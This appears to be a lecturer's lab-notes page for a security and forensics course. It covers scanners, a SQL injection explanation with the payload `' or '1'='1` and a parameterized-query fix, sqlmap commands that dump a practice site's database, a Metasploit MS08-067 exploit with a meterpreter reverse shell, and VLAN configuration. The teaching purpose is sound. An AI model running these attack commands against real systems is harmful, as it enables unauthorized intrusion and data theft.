
Hello Everyone, I am Assistant Professor Mr. Sridhar Iyer, working with the University of Mumbai for the last 6 years. I always believe in "Sharing Knowledge". I am rolling out a series of Video Tutorial Hands-On sessions on upcoming technologies and academic subjects based on my expertise and comfort. I am beginning with lab sessions on a fairly new subject "Advanced System Security and Digital Forensics". I am a Certified Ethical Hacker by E.C. Council USA and have my core expertise in Cryptography and System Security. I believe in sharing whatever knowledge and experience I have gained so far in my short but sweet stint as a Teacher. I hope this series of lectures and lab sessions help you learn something useful and interesting.
Presenting the very first video of the "Video Tutorial Lecture Series on - Advanced System Security and Digital Forensics". This video discusses the various prerequisites for this course.
The required software tools can be found here:
1. VMWARE(TRIAL VERSION)
2. ORACLE VIRTUAL BOX
3. KALI LINUX OS
4. UBUNTU OS
So gear up and be ready with the tools until we meet again with the 1st Hands-On Session.
Static code analysis using open source tools like RATS, Flawfinder, etc.
Steps
1. Download the Flawfinder tool from
https://dwheeler.com/flawfinder/
2. Download and install Anaconda Python Distribution version 3.7
https://www.anaconda.com/distribution/
3. Open Anaconda Prompt
4. Install Flawfinder
pip install flawfinder
5. Open the file in Flawfinder
6. Analyse the static code.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
Steps
1. nikto --help
2. nikto -h http://testphp.vulnweb.com/ -p 80
3. nikto -h http://testphp.vulnweb.com/ -p 80 -o results -F txt
Aim : To explore a website copier HTTrack
Steps
1. Download HTTrack from https://www.httrack.com/page/2/en/index.html
2. Create a project
3. Give it a Name
4. Give it a URL to copy
5. NEXT
6. Finish
Aim : Explore Web application vulnerabilities using Wapiti
Wapiti allows you to audit the security of your websites or web applications. It performs "black-box" scans (it does not study the source code) of the web application by crawling the web pages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
Steps
1. Open Anaconda Prompt
2. pip install wapiti3
3. wapiti --list
4. wapiti -u http://testphp.vulnweb.com/
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server. The vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
Example: "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
Normal Scenario: "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
Vulnerable Scenario (the password supplied is unknown' or '1'='1): "SELECT name FROM user where username = '" + username + "' and password = 'unknown' or '1'='1'";
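To see why the concatenated query fails and how a parameterized query closes the hole, here is an added example (not code from the original lab) that runs the page's query against an in-memory SQLite database. The table contents, the account names and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data in the page's `user` table (plaintext
    passwords only to match the page's query; real systems store hashes)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (name TEXT, username TEXT, password TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?, ?)", [
        ("Alice Example", "alice", "s3cret"),
        ("Bob Example", "bob", "hunter2"),
    ])
    return db


def build_concatenated_sql(username, password):
    # The page's query: user input becomes part of the SQL text itself.
    return ("SELECT name FROM user where username = '" + username +
            "' and password = '" + password + "'")


def login_concatenated(db, username, password):
    sql = build_concatenated_sql(username, password)
    return sorted(row[0] for row in db.execute(sql))


def login_parameterized(db, username, password):
    # Hardened form: the SQL text is fixed and the driver binds the inputs
    # as values, so quotes in them cannot change the statement's structure.
    sql = "SELECT name FROM user where username = ? and password = ?"
    return sorted(row[0] for row in db.execute(sql, (username, password)))


if __name__ == "__main__":
    db = make_db()
    crafted = "unknown' or '1'='1"   # the password value shown on the page
    print(build_concatenated_sql("alice", crafted))
    print("concatenated, correct password:", login_concatenated(db, "alice", "s3cret"))
    print("concatenated, crafted password:", login_concatenated(db, "alice", crafted))
    print("parameterized, crafted password:", login_parameterized(db, "alice", crafted))
    print("parameterized, correct password:", login_parameterized(db, "alice", "s3cret"))
```

Because AND binds more tightly than OR, the crafted value makes the concatenated WHERE clause true for every row, while the parameterized version compares the whole string against the stored password and matches nothing.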
Steps
1. $ sudo apt-get install sqlmap (for Linux)
2. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
3. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" --tables
4. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -T "TableName" --columns
5. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -T "TableName" -C "ColumnName" --dump
In this section we’ll walk you through the act of exploiting a live install of Windows XP Service Pack 3. We’ll make use of the well-known vulnerability in netapi32.dll in the Windows Operating System.
The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.
Steps
1. Choosing and configuring an exploit
(code that enters a target system by taking advantage of one of its bugs)
2. Choosing and configuring a payload
(code that will be executed on the target system upon successful entry)
3. Executing the exploit.
COMMANDS:
1. service postgresql start
2. msfconsole
3. show exploits
4. use windows/smb/ms08_067_netapi
5. show options
6. set RHOST "Victim's IP"
7. set payload windows/meterpreter/reverse_tcp
8. set LHOST "Your IP"
9. exploit
10. "Yippee You are inside the victim's machine"
pwd, mkdir, cat
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN).
ACCESS LISTS:
1. Standard Access List (1-99) Applied Closest to the destination
2. Extended Access List (100-199) Applied Closest to the source
1. Create 3 VLANs (Vlan 10, Vlan 20, Vlan 30)
2. Switch 2
vlan 20
name sales
exit
vlan 30
name sales
exit
int fa0/1
switchport access vlan 20
exit
int fa0/2
switchport access vlan 20
exit
int fa0/3
switchport access vlan 30
exit
int fa0/4
switchport access vlan 30
exit